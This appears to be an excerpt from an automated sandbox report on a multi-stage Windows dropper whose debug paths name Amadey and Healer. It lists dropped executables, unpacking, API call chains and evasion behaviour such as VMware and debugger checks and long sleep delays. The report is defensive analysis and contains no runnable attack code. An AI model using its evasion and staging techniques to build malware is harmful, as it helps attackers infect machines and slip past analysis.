                      Source: Binary string: wextract.pdb source: szDGo5lHdI.exe, szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, kino0095.exe, 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, kino2456.exe, kino2456.exe, 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, kino0588.exe, kino0588.exe, 00000003.00000000.263688959.0000000000191000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: szDGo5lHdI.exe, 00000000.00000003.260924559.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, ge821663.exe.0.dr
                      Source: Binary string: Healer.pdb source: con1332.exe, 0000000D.00000002.329988354.0000000007090000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wextract.pdbGCTL source: szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, kino2456.exe, 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, kino0588.exe, 00000003.00000000.263688959.0000000000191000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
                      Source: Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000000.331145914.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, dvL76s65.exe.2.dr
                      Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: kino0588.exe, 00000003.00000003.264209575.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, bus9402.exe, 00000004.00000000.264403832.00000000004D2000.00000002.00000001.01000000.00000007.sdmp, bus9402.exe.3.dr
                      Source: Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: kino0588.exe, 00000003.00000003.264209575.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000000.300762945.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1332.exe.3.dr
                      Source: Binary string: _.pdb source: con1332.exe, 0000000D.00000002.328304640.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000003.304290466.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, dvL76s65.exe, 0000000F.00000003.346294709.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\zarepot\talotoyuy1\guf.pdb source: kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000000.331145914.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, dvL76s65.exe.2.dr
                      Source: Binary string: C:\sigizecem\xigago\tukonunoz_givizadi\yodawusafix\11\j.pdb source: szDGo5lHdI.exe
                      Source: Binary string: Healer.pdbH5 source: con1332.exe, 0000000D.00000002.329988354.0000000007090000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Unpacked PE file: 0.2.szDGo5lHdI.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Unpacked PE file: 13.2.con1332.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Unpacked PE file: 15.2.dvL76s65.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Unpacked PE file: 0.2.szDGo5lHdI.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.data:W;.idata:R;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Unpacked PE file: 13.2.con1332.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Unpacked PE file: 15.2.dvL76s65.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_0040724D push ecx; ret 0_2_00407260
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_06903E94 pushad ; retf 0_2_06903E95
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_069058D3 push cs; ret 0_2_069058D4
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_06903F0B push FFFFFF8Bh; ret 0_2_06903F0D
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_06907623 pushfd ; ret 0_2_06907624
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B724D push ecx; ret 1_2_010B7260
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_0096724D push ecx; ret 2_2_00967260
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_0019724D push ecx; ret 3_2_00197260
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0041C40C push cs; iretd 13_2_0041C4E2
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00423149 push eax; ret 13_2_00423179
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0041C50E push cs; iretd 13_2_0041C4E2
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_004231C8 push eax; ret 13_2_00423179
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0040E21D push ecx; ret 13_2_0040E230
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0041C6BE push ebx; ret 13_2_0041C6BF
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C0C125 push ebx; ret 13_2_02C0C126
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C0BE73 push cs; iretd 13_2_02C0BF49
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C0BF75 push cs; iretd 13_2_02C0BF49
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BFE484 push ecx; ret 13_2_02BFE497
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_046B454E push ecx; retf 13_2_046B4554
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_046B4139 push edi; iretd 13_2_046B414E
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00402F1D
                      Source: en675431.exe.1.dr | Static PE information: 0xEFAF45DE [Wed Jun 5 03:28:30 2097 UTC]
                      Source: initial sample | Static PE information: section name: .text entropy: 7.985286241021559
                      Source: initial sample | Static PE information: section name: .text entropy: 7.842085736950787
                      Source: initial sample | Static PE information: section name: .text entropy: 7.7554731967823
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00401AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00401AE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_010B1AE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00961AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00961AE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00191AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_00191AE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe TID: 4488 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe TID: 2228 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe TID: 5136 | Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe TID: 6124 | Thread sleep count: 2031 > 30
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe TID: 5552 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Window / User API: threadDelayed 2031
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_2-2575
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_3-2575
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_1-2575
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_0-2821
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | API call chain: ExitProcess graph end node
                      Source: dvL76s65.exe, 0000000F.00000002.419531812.0000000007F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ;Y
                      Source: dvL76s65.exe, 0000000F.00000003.410086799.0000000007F78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware
                      Source: dvL76s65.exe, 0000000F.00000003.410086799.0000000007F78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareE7R15_4AWin32_VideoController8D1N5GGZVideoController120060621000000.000000-00045768007display.infMSBDAEGWTPFDPPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&
                      Source: dvL76s65.exe, 0000000F.00000002.412316821.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareE7R15_4AWin32_VideoController8D1N5GGZVideoController120060621000000.000000-00045768007display.infMSBD
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00405467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00402390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00962390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00192390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_069020A3 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0040ADB0 GetProcessHeap,HeapFree
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00406F40 SetUnhandledExceptionFilter
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00406CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B6F40 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00966F40 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00966CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00196F40 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00196CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_004123F1 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BFE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BFD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C071D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C02658 SetUnhandledExceptionFilter
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_004017EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00417A20 GetLocaleInfoA
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C07C87 GetLocaleInfoA
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00407155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
